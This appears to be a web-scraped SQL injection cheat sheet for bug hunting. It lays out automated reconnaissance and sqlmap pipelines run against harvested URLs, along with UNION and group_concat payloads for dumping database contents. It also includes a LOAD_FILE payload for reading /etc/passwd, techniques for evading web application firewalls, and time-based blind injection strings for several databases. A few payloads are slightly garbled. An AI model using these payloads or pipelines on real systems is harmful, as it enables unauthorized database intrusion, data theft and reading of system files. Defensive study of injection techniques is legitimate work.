Use Burpsuite:

1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, look for SQL vulnerability that has been detected. 5. Manually try SQL injection payloads. 6. Use SQLMAP to speed up the  process.Copy the code

2. Use Waybackurls and other tools:

  1. sublist3r -d target | tee -a domains (you can use other tools like findomain, assetfinder, etc.)
  2. cat domains | httpx | tee -a alive
  3. cat alive | waybackurls | tee -a urls
  4. gf sqli urls >> sqli
  5. sqlmap -m sqli --dbs --batch
  6. use tamper scripts
Copy the code

3. Use heuristic scan to obtain hidden parameters:

1. Use subdomain enumeration tools on the domain. 2. Gather all urls using hakcrawler, waybackurls, gau for the domain and subdomains. 3. You can use the same method described above in 2nd point. 4. Use Arjun to scan for  the hidden params in the urls. 5. Use --urls flag to include all urls. 6. Check the params as https://domain.com?<hiddenparam>=<value> 7. Send request to file and process it through sqlmap.Copy the code

4. Generate errors with untrusted input or special characters:

1. Submit single quote character ' & look for errors. 2. Submit SQL specific query. 3. Submit Boolean conditions such as  or 1=1 and or 1=0, and looking application's response. 4. Submit certain payloads that results in time delay.Copy the code

5. Use order by or group by to find total number of columns:

  Submit a series of ORDER BY clause such as 
    
    ' ORDER BY 1 --
    ' ORDER BY 2 --
    ' ORDER BY 3 --
    
    and incrementing specified column index until an error occurs.
Copy the code

6. Use the union operator to find vulnerable columns:

  Submit a series of UNION SELECT payloads.
  
    ' UNION SELECT NULL --
    ' UNION SELECT NULL, NULL --
    ' UNION SELECT NULL, NULL, NULL --
    
  (Using NULL maximizes the probability that the payload will succeed. NULL can be converted to every commonly used data type.)
Copy the code

7. Use concat() or group_concat() to extract basic information such as database(), version(), user(), and UUID()

1. Database version

    Oracle         SELECT banner FROM v$version
                 SELECT version FROM v$instance
    Microsoft         SELECT @@version
    PostgreSQL         SELECT version()
    MySQL         SELECT @@version
Copy the code

2. Database content

    Oracle        SELECT * FROM all_tables
            SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
    
    Microsoft     SELECT * FROM information_schema.tables
                  SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
    
    PostgreSQL     SELECT * FROM information_schema.tables
                  SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

    MySQL         SELECT * FROM information_schema.tables
                  SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
Copy the code

3. Display the version, user name, and database name

' AND 1=2 UNION ALL SELECT concat_ws(0x3a,version(),user(),database())
Copy the code

4. Use the group_concat() function to concatenate all rows that return the result.

'union all select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database() -Copy the code

8. Use load_file() to access system files. Then develop ahead of time:

' UNION ALL SELECT LOAD_FILE ('/ etc / passwd')
Copy the code

9. Circumventing WAF:

1. Use Null bytes before SQL query

    %00' UNION SELECT password FROM Users WHERE username-'xyz'--
Copy the code

2. Use SQL to inline comment the sequence

'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/username/**/LIKE/**/'xyz'--
Copy the code

3. Address coding

    for example :
    / URL encoded to %2f
    * URL encoded to %2a

    Can also use double encoding, if single encoding doesn't works. Use hex encoding if the rest doesn't work.
Copy the code

4. Change case (upper/lower case)

5. Tamper with the script using SQLMAP. It helps to bypass WAF/IDS/IPS.

6. Time delay:

      Oracle         dbms_pipe.receive_message(('a'),10)
      
      Microsoft     WAITFOR DELAY '0:0:10'
      
      PostgreSQL     SELECT pg_sleep(10)
      
      MySQL         SELECT sleep(10)
Copy the code

7. Conditional delay:

      Oracle         SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
      
      Microsoft     IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
      
      PostgreSQL     SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
      
      MySQL         SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')
Copy the code